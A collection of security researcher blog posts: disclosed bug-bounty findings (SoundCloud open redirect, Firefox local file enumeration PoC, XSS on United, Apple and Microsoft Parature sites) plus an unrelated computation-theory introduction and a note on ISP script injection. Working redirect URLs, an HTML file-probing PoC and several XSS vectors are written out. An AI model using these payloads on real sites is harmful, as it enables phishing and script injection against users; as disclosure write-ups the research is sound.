Bypassing SoundCloud’s protection for open redirections

Hello everybody,

In this blog post I will explain how I found an open redirect issue in SoundCloud’s redirection system, which could have been abused by attackers to mislead users and possibly phish their credentials or trick them into performing harmful actions.

So it was a rainy day and I was just getting home after a long day working on university assignments (I have to mention that to unload it :S), when I noticed that I had received a message from SoundCloud informing me that a user had liked a track I previously posted on my profile.

I started looking around for links and noticed an interesting one that uses a GET parameter called “url”, which clearly works as an intermediary that redirects to whatever that parameter points to. The link looked like the following (Follow the link, the track is cool for those who like Trance and EDM 😉 ):

http://soundcloud.com/-/t/click/postman-email-notifications-sound_like?url=https%3A%2F%2Fsoundcloud.com%2Fstrukt-93%2Fjohnny-fiasco-johnny-fiasco-conduction-santiago-bushido-remix-defalts-music

So I immediately started messing around for a while to see whether it was well protected against open redirects. After trying for about 10 minutes, I had concluded the following points (URLs shortened for simplicity):

  • We can actually redirect to https://whatever.soundcloud.com, but that would be pointless, because we would need to find a subdomain takeover first, which is clearly a bigger issue in itself anyway.
  • Any scheme before the domain name is accepted, and by “any scheme” I mean that strukt://soundcloud.com would cause the server to happily issue a 302 redirect to strukt://soundcloud.com.
  • The string supplied to the “url” parameter cannot start with a dot.

So with all these givens (disregarding the second point, as it’s not that useful in our context), I wondered how I could leverage these bits of knowledge to bypass the protection in place.
Eventually, a simple but interesting thought came to my mind: what would happen if I injected CRLF characters somewhere in the value of the “url” parameter? Maybe I could trigger different behavior, or at the very least an error that would guide me further. So I started with %0a (LF), and it was completely ignored by the application; the redirect was made to https://soundcloud.com.

I then tried %0d (CR) and, to my surprise, received a different response than the first one.

The value injected after the %0d character is appended directly to the string “http://soundcloud.com”. I then tried to change whatever comes after the CR character, but it seemed it was still checked by the back-end code. But wait a second! We know that we can substitute the scheme of the URL we supply with whatever we want, right? Well, yes, we can actually supply any string we want before the “://soundcloud.com” part. So the following is acceptable:

http://soundcloud.com/-/t/click/postman-email-notifications-sound_like?url=evilsoundcloud.com://soundcloud.com

And the following are the request and response of the above:

And voilà! A redirect to http://soundcloud.comevilsoundcloud.com//soundcloud.com is issued by SoundCloud’s server with no complaints.
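To illustrate how a response like that can come about, here is a minimal sketch of a back-end check (entirely hypothetical, written in JavaScript for illustration; SoundCloud’s actual code is unknown) that validates only what follows “://” and then rebuilds the redirect target by string concatenation:

// Hypothetical sketch, NOT SoundCloud's actual back end: the host check
// only looks at what follows "://", and the redirect is rebuilt by
// concatenating attacker-controlled pieces around the trusted host.
function buildRedirect(url) {
    var parts = url.split("://");
    var scheme = parts[0];
    var rest = parts[1];
    if (!rest || rest.indexOf("soundcloud.com") !== 0) {
        return "https://soundcloud.com/"; // fall back to the homepage
    }
    // Flawed rebuild: the attacker-controlled "scheme" lands right
    // after the trusted host name.
    return "http://soundcloud.com" + scheme + "//" + rest;
}

console.log(buildRedirect("evilsoundcloud.com://soundcloud.com"));
// -> http://soundcloud.comevilsoundcloud.com//soundcloud.com

Note that the resulting host, soundcloud.comevilsoundcloud.com, is a subdomain of comevilsoundcloud.com, a domain an attacker is free to register.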

Thanks for reading, see you in another write-up.

Introduction to the Theory of Computation: Prologue

Welcome everybody,

In an old tweet, I asked if anyone would be interested in blog posts explaining theoretical computing and the theory of computation. Although only around 10 people reacted to the tweet, I still decided to go ahead and start a series of blog posts on the subject.

The reason I chose to do so is that, aside from being essential for those majoring in CS, the theory of computation is a fascinating subject that will help readers expand their knowledge and understanding of how computers work at the most fundamental level.

Curriculum

The curriculum we will follow in order to deeply and thoroughly explain the fundamentals of the theory of computation is the one laid out in the book “Introduction to the Theory of Computation” by Michael Sipser.

I will explain the chapters one by one in separate blog posts, possibly splitting a chapter across more than one post if it turns out to be lengthy or mentally taxing for the readers. Now, let’s start with the very first part of the book, a brief overview of what’s actually covered in this course.

Automata, Computability, and Complexity

These are the three main areas the book concentrates on explaining and discussing; they can be grouped under the following question:

What are the fundamental capabilities and limitations of computers?

Mathematicians started investigating this question in the 1930s, and since then computers have advanced significantly and helped bring the question out of the theoretical world and into the practical one. The question can be answered and interpreted differently in each of the three areas, which will be covered throughout the course.

Complexity Theory

Computer problems can be either easy or hard to solve. For example, the sorting problem is not as hard as the scheduling problem. Say you have a million numbers that you want to sort in ascending or descending order; a regular computer can do this in a relatively short time. But if we try to schedule a thousand classes into one timetable, subject to rules such as no two classes being held in the same room at the same time and no instructor teaching two courses in two classrooms simultaneously, the task appears to be of much greater difficulty. In fact, a supercomputer could require centuries to determine an answer to that particular scenario. The main question asked in complexity theory is the following:

What makes some problems computationally hard and others easy?

Although it may look like an easy question, computer scientists still don’t have a complete answer. They have, however, been able to classify problems according to their computational difficulty, which gives us a way to present evidence that a problem is computationally hard even when we can’t prove it.

There are several approaches to follow when one stumbles upon a computationally hard problem. First, if the root of the hardness can be clearly identified, altering that root may reshape the problem into an easier form that can be computed faster and still solve the main problem. Second, if the first approach isn’t feasible, finding an approximate solution may sometimes suffice in place of an exact one. Third, some problems are hard only in their worst case and easily computed in typical cases, which may be acceptable for applications that can tolerate running slowly sometimes as long as they run fast most of the time. Finally, there are other options, such as considering alternative types of computation, like randomized computation.

An application most readers can relate to is cryptography. Unlike most settings, where we seek easier computational problems because they are easier to solve, cryptography deliberately employs hard problems, since its main aim is to produce ciphertexts that are practically unbreakable, or at least very costly to break. This is easily illustrated by password brute-forcing, where a password 5 characters long takes much less time to brute-force than one 7 characters long.
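As a quick worked example of that growth, assuming a lowercase-only alphabet for simplicity:

// Each extra password character multiplies the keyspace by the alphabet size.
var ALPHABET = 26; // lowercase letters only, for simplicity
[5, 7].forEach(function (len) {
    console.log("length " + len + ": " + Math.pow(ALPHABET, len) + " candidates");
});
// length 5: 11881376
// length 7: 8031810176  (26^2 = 676 times more work for two extra characters)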

Computability Theory

Mathematicians such as Alan Turing, Alonzo Church, and Kurt Gödel discovered that certain basic problems cannot be solved by computers. For example, determining whether an arbitrary mathematical statement is true or false cannot be solved by a computer, even though it is a purely mathematical problem. One outcome of research in this area was the development of theoretical models of the computers we use in modern times, such as Turing machines and finite automata.

Complexity theory and computability theory are closely related. In short, complexity theory is concerned with determining how computationally hard a problem is, whereas computability theory is about determining whether a problem can be solved computationally in the first place.

Automata Theory

This last part deals with the definitions and properties of mathematical models of computation, which are used in many areas of computer science. One model I just mentioned is the finite automaton, which is used in text processing and compiler design. Another is the context-free grammar, which is used in designing programming languages.
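To make the finite automaton model concrete before we study it formally, here is a toy example of my own (not from the book): a DFA, written in JavaScript, that accepts binary strings containing an even number of 1s:

// A deterministic finite automaton with two states tracking the parity of 1s.
var dfa = {
    start: "even",
    accept: { even: true },          // accepting states
    delta: {                         // transition table: state x symbol -> state
        even: { "0": "even", "1": "odd" },
        odd:  { "0": "odd",  "1": "even" }
    }
};

function accepts(machine, input) {
    var state = machine.start;
    for (var i = 0; i < input.length; i++) {
        state = machine.delta[state][input[i]]; // one transition per symbol
        if (state === undefined) return false;  // symbol outside the alphabet
    }
    return !!machine.accept[state];
}

console.log(accepts(dfa, "1001")); // true  (two 1s)
console.log(accepts(dfa, "1011")); // false (three 1s)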

From this theory, we will begin our study of the theory of computation. This is because complexity theory and computability theory both need a precise definition of a “computer” first, and that is exactly what we get by studying automata theory.

With this, we come to the end of the first blog post in the theory of computation series. See you in the next post, where we will go over some mathematical notions and basic terminology.

Please leave a comment if anything is not clear enough or needs further explanation; Twitter DMs are open as well.

Firefox Local Filename Enumeration (sec-low)

Hello everyone,

This is going to be a short write-up about my first browser bug, found in Firefox 45.0. The bug is of type “csectype-disclosure” and was rated sec-low by Mozilla’s team, due to the fact that the malicious page has to be loaded locally (via the file:// protocol).

The bug existed because a <track> element’s onerror event fires twice if the file pointed to by its src attribute doesn’t exist, but only once if the file exists but is not playable. The <track> tag has to be placed between the opening and closing tags of an <audio> or <video> element. The following code is the PoC that was sent along with the report to Mozilla’s team:

<html>
<head>
<title>Testing</title>
</head>
<body>
<audio>
   <track id="q" src="file:///etc/passwd">
</audio>
<script>
var i = 0;
// onerror fires once if the file exists but isn't playable,
// twice if it doesn't exist at all.
q.onerror = function(){
    i++;
};
// Give the error events time to fire, then count them.
setTimeout(function(){
    if(i == 1){
        alert('File Exists');
    }else{
        alert('File Does Not Exist');
    }
}, 100);
</script>
</body>
</html>

Finally, I would like to give a shout-out to @Qab for making all of that possible.

Update: This bug has been assigned CVE-2017-5387.

United to XSS United

Hello there,

In this blog post, I will explain how I was able to bypass some client-side, so-called XSS “protection”.

While I was looking for cheap flights, I recalled that United offers a bug bounty program that rewards researchers who report security vulnerabilities with free mileage.

As I started testing their websites, I found a couple of bugs and reported them; then I came across the subdomain http://checkin.united.com.

Visiting the above link redirected me to another page on the same subdomain, with a GET parameter called “SID”. I started testing that parameter and noticed that its value gets reflected in the document 60+ times, none of which is properly sanitized against special characters, allowing me to break out of the tags it is reflected in, every single time.

I simply entered "> followed by a script tag to get the alert box I was looking for, but weirdly enough, no alert boxes appeared at all. I then inspected the source of the page and found that my injection actually landed untouched, exactly the same, 60+ times, yet the JS payload didn’t execute.

Some of the payload reflections in the document

I started digging into the script tags and the code they contained, until I reached the source of my misery: a JS file included in the page that contained the following code:

JS code that caused the trouble

Basically, the code overrides the native alert(), confirm(), prompt(), unescape(), and document.write() functions and nullifies them, so calling them does absolutely nothing. This was implemented as an “XSS protection”.
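The gist of it looked something like the following (my paraphrase of the idea, not the site’s exact code):

// The "protection", in essence: native functions replaced with no-ops,
// so any injected payload that calls them fails silently.
window.alert = window.confirm = window.prompt = function () {};
window.unescape = function () { return ""; };
document.write = function () {};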

So after some research, I managed to restore document.write() to its default state by calling document.write = HTMLDocument.prototype.write; document.write('STRUKT');. But again, what good does that do with all the main functions I actually want to call still sabotaged?

Using document.write() to print into the document


I started playing around with the help of my friend and teacher @brutelogic, who provided me with this link, which talks about the JS defense in place. The article also mentioned that the overridden functions could be restored to their defaults using the delete keyword. We tried it, but that keyword happened to be blacklisted as well. Then I had an idea: what if I injected an empty iframe tag (without a src attribute) and set the main window’s alert() function to that iframe’s native alert function? It would then be reset to the default alert() any document has.

I tried the new idea and it actually worked, bypassing all the “XSS protections” in place and circumventing the overrides implemented by the developers.
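Here is a minimal sketch of the trick (the markup is illustrative, not the exact payload I injected): a fresh, src-less iframe comes with its own clean window object, so its untouched native alert() can simply be copied over the sabotaged one:

<iframe id="f"></iframe>
<script>
// The page nulled out window.alert, but the new iframe's contentWindow
// still carries the pristine native implementation.
window.alert = document.getElementById("f").contentWindow.alert;
alert(document.domain); // pops again
</script>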

The beloved alert box finally popping up

Then my friend @brutelogic optimized the payload into a much shorter one that also works in Chrome and bypasses the XSS Auditor (because there’s also an unsanitized reflection in a tag context).

Brute’s payload working in Firefox
Brute’s payload bypassing Chrome’s XSS Auditor

I then decided to go further and check whether United’s main website contained the same flaws. After less than 10 minutes of investigation, I found that the exact same vulnerable path from http://checkin.united.com exists on United’s main website, with exactly the same imported libraries and the same 60+ vulnerable reflections, killing two birds with one stone.

XSSing United’s main website with the same payload

Finally, I would like to thank my teacher and friend @brutelogic for his continuous support and generosity in providing me with brilliant and unexpected information.

See you in another post 😉 

Apple and the 5 XSSes

Hello guys and welcome back,

On the 10th of March, 2016, I decided to start looking for cross-site scripting vulnerabilities in Apple’s websites. I really can’t remember what motivated me to start hunting there, but it was a good idea anyway.

I first started enumerating the targets as usual, found a big list of subdomains and started to look for XSS bugs on each of them.

After spending a couple of hours looking for XSSes and finding nothing at all, I noticed that most of the subdomains require users to be logged in before they can be used, so I created an Apple ID and started logging in to each subdomain to take a deeper look.

The first XSS I found was a reflected XSS on the subdomain https://checkcoverage.apple.com, which is designed for users who want to check their Apple products’ warranty status and whether they are eligible for support and extended coverage.

While surfing the subdomain I just mentioned, I found a GET parameter called “sn”, which is -obviously- the placeholder for the serial number of the product the user wants to check. I started probing to see whether the parameter’s value gets reflected in the page, so I used a string as simple as <"xss' to check whether any of those special characters get removed or encoded. See the following screenshot:

The injected payload is reflected inside a script tag with no encoding or sanitization of the special characters at all, thus injecting "-alert(document.domain)-" was enough to trigger the following alert box:
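To see why that payload works, consider a sketch of the reflection point (the variable name is hypothetical): the injected value turns the assignment into an arithmetic expression that calls alert() as a side effect:

// Before injection (hypothetical):  var sn = "SERIAL_GOES_HERE";
// After injecting "-alert(document.domain)-" the page source becomes:
var sn = ""-alert(document.domain)-"";
// JavaScript evaluates ("" - alert(document.domain) - ""): the subtraction
// itself is nonsense (NaN), but alert() runs while it is computed.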

The second XSS is a stored one and lies in the subdomain https://iadworkbench.apple.com/. This subdomain is for advertising purposes and business-related stuff, and I found that the organization’s name gets reflected inside a script tag without any sanitization.

Again, using "-alert(document.domain)-", I was able to produce the following alert box:

The third XSS I found was on the subdomain https://appleid.apple.com; if you follow that link, you will find the message “Your account for everything Apple.” written between two <h2> tags. Yes, this subdomain is there for users to manage their Apple IDs, which give them access to everything they use that is related to Apple.
I started messing around with the parameters I saw, until I came across the GET parameter “key”, which, over and over again, gets reflected inside a tag context without any cleansing, leaving one of Apple’s most important online services vulnerable to one of the simplest, yet most devastating attacks. See the following screenshot:

This time, just to vary the XSS vector, I decided to close the tag prematurely and inject my own tag. I noticed that certain tags were being removed completely from the input while others survived, so I injected a surviving tag with an event handler calling alert(1), but the alert box didn’t appear.

It turned out part of my event handler was still being removed, so I reworked the payload around that blacklist and this time it worked, showing that Apple was protecting one of their most important online services with one of the worst approaches ever: blacklisting.

The fourth XSS affects the subdomain http://mynews.apple.com, and honestly, this is one of the weirdest and easiest XSSes I have ever come across.

Developers often make mistakes like taking parameter values and letting them into the page source without appropriate handling. But this case was quite different: the developers were taking the value of the “locale” GET parameter, appending it to some URL, and then using the result as the action attribute of a form on the page. Nothing strange, right?!

Actually, no. The truly bizarre thing here was that they were correctly encoding the " and < characters of the injected payload, but they left the value of the action attribute unquoted. See the following screenshot for a better understanding:

Breaking out of the action attribute was then a piece of cake: adding a %20 (space) after the value of the “locale” parameter and appending an event handler payload such as onmouseover=alert(document.domain) was all that was needed to do the job.
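A sketch of the flaw (the URL and markup are illustrative, not Apple’s actual page): because the attribute is unquoted, the encoding of " and < never matters; a plain space is enough to start a new attribute:

<!-- With locale=en-us%20onmouseover=alert(document.domain) the server emits: -->
<form action=/news?locale=en-us onmouseover=alert(document.domain) method="post">
<!-- The browser parses "onmouseover=..." as a separate attribute of the form. -->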

The fifth and last XSS in this series was found on the subdomain https://atlaslms.apple.com. This one was pretty straightforward: a GET parameter called “criteria” was being inserted as the value attribute of a hidden input tag with no sanitization at all, so I just injected "> followed by my own tag to pop the alert.

Conclusion:

While Apple may be doing a good job securing their OSes and devices, they fail big time when it comes to protecting their own online services, including some that are fairly critical to users.
The other thing I’d like to mention is that Apple, being a tech giant, doesn’t pay bounties to whitehats, which, from my point of view, is the main reason their services are not well secured, as well as the reason a blackhat was happy to get paid to hack into the iPhone the U.S. government was trying to convince Apple to unlock.

Finally, I would like to mention that, more than 3 months after I reported the issues, some of the bugs are still reproducible at the time this post is released. Also, on the 23rd of March I was asked to provide my information to enter Apple’s Hall of Fame for the https://appleid.apple.com XSS, yet my name still doesn’t appear there.

Thanks for reading, see you in another post.

Microsoft’s Parature XSS

Hello,

One day, I decided to test ask.com and its subdomains for XSS. While doing so, I came across a link pointing to their help center, located at help.ask.com.

Clicking on the link, the URL resolved to http://help.ask.com/ics/support/default.asp?deptID=30018&_referrer= , and I started testing the parameter “_referrer” to see if it was vulnerable to open redirects.

I found that the value of the parameter gets reflected inside a function within a script tag, so I quit testing for open redirects and started looking for a way to trigger an XSS instead. See the following picture:

The developers did not sanitize the value of “_referrer” properly: double quotes, alert() and similar functions, and tags were all allowed. So all I needed at this stage was some help from my friend and teacher, Brute Logic. He noticed that the function exitSupport() was never called on the page, so all he had to do was break out of it.
The following two screenshots show the code after the injection of the payload and the alert box:
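In essence, the situation looked something like this sketch (the function body and the exact payload are illustrative): since exitSupport() is never invoked, the trick is to close the string and the function early so the payload lands at the top level of the script, where it runs on page load:

// Hypothetical reflection point inside the never-called function:
//     function exitSupport() { var referrer = "_REFERRER_VALUE_"; }
// Injecting a value like  ";}alert(document.domain);function f(){//  yields:
function exitSupport() { var referrer = "";}alert(document.domain);function f(){//";
}
// The string and function are closed early, alert() now sits at the top
// level, and the dummy function f() swallows the leftover closing brace.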

After we successfully triggered the alert box, Brute suggested that I look deeper into the bug, saying “don’t stop there, try to figure out where the rabbit hole really goes”.

He then told me to look for websites containing the same code inside the script tag, and advised me to use nerdydata.com. So I went to the mentioned website and searched for the function exitSupport(), and there was the surprise: I found dozens of websites running the same flawed piece of software. See the picture below:

Going further into the research, Brute quickly identified the origin of the flawed script; the following screenshot shows the name of the flawed service:

We only realized that the product was owned and developed by Microsoft after we visited Parature’s official website, parature.com:

The following is an excerpt from parature.com:

“Parature is a cloud-based customer service solution that empowers brands and organizations to deliver consistent care anytime, anywhere through a powerful combination of knowledge management, self-service and multi-channel engagement. Quick to deploy, scalable and flexible, and mobile-responsive, discover the customer support software solution that many of the world’s leading brands are using to deliver productive, proactive and personalized customer care.”.

Then, we decided to look for other websites affected by the flaw, and we found some big names; below is a GIF containing some of them:

Timeline:

  • 17-11-2015 Initial report; Microsoft replied that they couldn’t reproduce the issue, so further explanation was sent
  • 18-11-2015 Microsoft replied that they had opened a case for the bug
  • 30-11-2015 I sent an email asking whether the bug had been fixed
  • 02-12-2015 Microsoft replied that the issue was fixed and asked for our names for the Hall of Fame
  • 19-01-2016 The Hall of Fame for the month of December was released

Beware!! Vodafone’s spying on you

Hello,

Today, while surfing Twitter, I noticed Brute Logic’s tweet about the JS event handler “onbeforescriptexecute”, which makes the tag carrying it execute JS right before every <script> tag on the page starts executing.
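For reference, here is a sketch of my own (not Brute’s exact PoC) of how the event behaves; beforescriptexecute was a non-standard, Firefox-only event, since removed, that fired just before each <script> on a page started executing:

<script>
// Registered too late to observe its own <script> tag, but fires once
// for every script that starts executing after it.
document.addEventListener("beforescriptexecute", function () {
    alert("a script is about to run");
});
</script>
<script>/* this tag triggers exactly one alert */</script>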

I followed the link provided in the tweet, anticipating that only one alert would fire because of the single <script> tag already on the page, but I was surprised to see that two alert boxes actually appeared.

I inspected the source code of the page and was thrilled to see a completely new <script> tag there, one that was neither on the page in the first place nor injected by the payload. See the following screenshot:

After some research on Google, I found out that the script gets injected by my ISP, Vodafone. This means they are intercepting and eavesdropping on EVERY request I make to EVERY page that doesn’t use HTTPS, and of course on EVERYONE else’s requests as well.

The script basically replaces all the images on a given page with low-quality versions, saving Vodafone bandwidth and giving them the opportunity to inspect every request issued by the devices connected to their network.
Reference: http://www.sphaero.org/blog:2012:0418_am_i_hacked_oh_it_s_just_vodafone